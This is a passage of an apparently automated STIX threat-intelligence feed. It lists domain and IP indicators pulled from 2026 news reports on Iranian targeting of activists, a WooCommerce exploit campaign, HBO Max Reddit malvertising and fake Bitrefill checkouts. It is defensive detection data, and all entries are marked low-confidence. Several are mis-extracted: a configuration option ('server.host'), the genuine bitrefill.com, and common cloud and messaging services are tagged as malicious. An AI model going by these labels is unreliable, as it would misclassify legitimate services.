News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d26a6286-ce21-48aa-a773-dbeeef5b9d7f","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: api.telegram.org","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: ing in logging unexpectedly should be investigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io ip","pattern":"[domain-name:value = 'api.telegram.org']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--92b37bfd-4b04-4b07-bbf1-4e58d47ef38b","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: backblazeb2.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: ctedly should be investigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightnin","pattern":"[domain-name:value = 'backblazeb2.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8e7ac695-f3f9-4633-abe8-83bffe10415b","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: iproyal.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: [.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best defence is fo","pattern":"[domain-name:value = 'iproyal.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0e30f534-5dbc-4913-96a9-18f7dc1919f4","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: lightningproxies.net","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: zeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best defence is for the user/victim to be","pattern":"[domain-name:value = 'lightningproxies.net']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0c002f66-155d-4c50-adbc-48dcc3ca8a45","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: storjshare.io","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: : api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best","pattern":"[domain-name:value = 'storjshare.io']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f5b465a9-e640-4a03-97a4-edb191967193","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: vultrobjects.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: nvestigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Miti","pattern":"[domain-name:value = 'vultrobjects.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ea9bbd8a-1f59-43ee-8bee-f133db8c04c7","created":"2026-09-15T11:51:03.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ember-bridge.com","description":"Seen in \"HBO Max’s verified Reddit account hijacked to spread malware\" (Malwarebytes Labs). Context: lution with a web protection component. Malwarebytes blocks ember-bridge.com, which is part of the PasteSwitch infrastructure. Educate y","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-15T11:51:03.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/news/2026/09/hbo-maxs-verified-reddit-account-hijacked-to-spread-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc75eaff-3d73-47c8-99b6-aafd1e019fc2","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 104.194.9.138","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 6,600 blocked exploit requests IP address 104.194.9.138 Observed source of more than 6,100 blocked exploit requests","pattern":"[ipv4-addr:value = '104.194.9.138']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--60283cec-0c9a-486c-92c3-1dde1864eef8","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 114.10.43.203","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: source of more than 470 blocked exploit requests IP address 114.10.43.203 Observed source of more than 310 blocked exploit requests I","pattern":"[ipv4-addr:value = '114.10.43.203']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8deecd5f-71b3-4318-a690-95d89a9e74f2","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 187.75.114.36","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 6,100 blocked exploit requests IP address 187.75.114.36 Observed source of more than 470 blocked exploit requests I","pattern":"[ipv4-addr:value = '187.75.114.36']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--64a2b638-77b2-4a79-b665-5df96e41d68b","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 23.137.105.214","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 9,100 blocked exploit requests IP address 23.137.105.214 Observed source of more than 6,700 blocked exploit requests","pattern":"[ipv4-addr:value = '23.137.105.214']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--10ae1490-0426-44a2-b9fa-f2ebd02f3e0d","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 23.180.120.140","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 6,700 blocked exploit requests IP address 23.180.120.140 Observed source of more than 6,600 blocked exploit requests","pattern":"[ipv4-addr:value = '23.180.120.140']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--85409e2d-d66b-4afe-8aa5-0b63574bf6ac","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 31.59.129.150","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: rce of more than 24,900 blocked exploit requests IP address 31.59.129.150 Observed source of more than 24,000 blocked exploit request","pattern":"[ipv4-addr:value = '31.59.129.150']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eb1239f5-dca5-421d-96fe-81358f0b64ff","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 37.114.144.209","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: source of more than 310 blocked exploit requests IP address 37.114.144.209 Observed source of more than 310 blocked exploit requests F","pattern":"[ipv4-addr:value = '37.114.144.209']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--01cc82fc-eefe-446a-a0e9-d2fa55430caf","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 92.241.13.140","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: rce of more than 16,000 blocked exploit requests IP address 92.241.13.140 Observed source of more than 9,100 blocked exploit requests","pattern":"[ipv4-addr:value = '92.241.13.140']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8be9f0ec-776e-4432-9e01-59fbeeb084f4","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 92.241.13.213","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: f compromise (IoCs):- Type Indicator Description IP address 92.241.13.213 Observed source of more than 24,900 blocked exploit request","pattern":"[ipv4-addr:value = '92.241.13.213']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--39a427ae-e89f-4554-bbfb-71cc25a0a1c8","created":"2026-09-15T11:12:32.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: server.host","description":"Seen in \"Mass-Scanning Campaign Exploits Vite Flaw to Extract Cloud Credentials From Exposed Dev Servers\" (The Hacker News). Context: exposes the Vite dev server to the network using --host or server.host config option The sensitive file exists in the allowed dire","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-15T11:12:32.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/mass-scanning-campaign-exploits-vite.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--98379deb-7d4c-47d0-9b74-d3a18711f83c","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: clean-disk-guide.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: oke down into 15 ads for a fake macOS disk utility at apple.clean-disk-guide[.]com and 11 for other developer tools at code-desktop[.]com. O","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--939af3ff-2e89-4237-a818-471be0041da3","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: code-desktop.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: .clean-disk-guide[.]com and 11 for other developer tools at code-desktop[.]com. One entry point into a larger system The HBO Max ads wer","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dee15c54-459d-4aa1-aa70-ccba85cfdaa5","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: codex-craft.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: -macos[.]com. Another 36 posed as OpenAI Codex, pointing to codex-craft[.]com. The rest broke down into 15 ads for a fake macOS disk ut","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d95c3e79-9038-45c7-8d5d-c270da69ee7b","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomax-macos.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: s, 46 used an HBO Max lure, split between hbomaxx[.]app and hbomax-macos[.]com. Another 36 posed as OpenAI Codex, pointing to codex-craf","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--580acfb9-3388-4ee2-be37-550f4b6ee0d2","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomaxx.app","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: id . Of the 108 ads, 46 used an HBO Max lure, split between hbomaxx[.]app and hbomax-macos[.]com. Another 36 posed as OpenAI Codex,","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--440c209e-f1c2-4a2b-aa0c-836de83f6799","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomaxx.us","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: HBO Max subreddits,” wrote the user. Clicking the ad led to hbomaxx[.]us, “which looks somewhat legitimate, and has a join button","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1d59738d-d2dc-457d-a7d1-7629e77c5a0b","created":"2026-09-15T09:09:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomaxx.us","description":"Seen in \"Hacked HBO Max Reddit Account Used for Malware Delivery via ClickFix Attack\" (SecurityWeek). Context: ich does not exist. Clicking the malicious ads led users to hbomaxx[.]us, a page mimicking the official HBO Max site that also con","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T09:09:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/hacked-hbo-reddit-account-used-for-malware-delivery-via-clickfix-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a1e955e7-ad1c-40ee-8b69-075597a7983c","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: biterflll.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y tips in seconds. Indicators of compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com b","pattern":"[domain-name:value = 'biterflll.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--90f3072e-96af-4707-b2d7-a40ce7d2d393","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bitigift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: s. Indicators of compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.","pattern":"[domain-name:value = 'bitigift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ae1bba97-5d66-4659-8f92-9e51bab7f706","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bitrefall.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: f compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.","pattern":"[domain-name:value = 'bitrefall.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c8f9d3d0-a86d-4eea-bf36-51886d862a62","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bitrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ed or charged back. Confirm that the main domain is exactly bitrefill.com before approving a payment. Be wary of domains containing a","pattern":"[domain-name:value = 'bitrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--388d12c4-852a-4fa7-99c1-c8fdde28bd30","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bitrefill-payments.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: Cs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitr","pattern":"[domain-name:value = 'bitrefill-payments.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--55a3e8b4-db46-4ae8-b36e-ccf3e889859a","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bitrefill-pays.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[","pattern":"[domain-name:value = 'bitrefill-pays.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d216ff49-589d-4a9b-a418-7553f7d62736","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bitregift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: trefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[","pattern":"[domain-name:value = 'bitregift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6e936700-b5ee-4147-8188-70d5bdbcbd72","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bitregill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: trefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[","pattern":"[domain-name:value = 'bitregill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--48838880-c2b0-483d-a681-62b72d0d1fc4","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bitretill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: [.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[","pattern":"[domain-name:value = 'bitretill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--863d904b-a7a9-4392-be61-44bd2fbe5c6d","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bitrgift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: -pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill","pattern":"[domain-name:value = 'bitrgift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0ec6a862-6b9b-4777-946e-3adae573b3a4","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bitrgifts.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: regift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitre","pattern":"[domain-name:value = 'bitrgifts.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b83009b8-ee2a-4b01-bf37-4cd270e920c9","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bitrnfill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: regill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-b","pattern":"[domain-name:value = 'bitrnfill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes 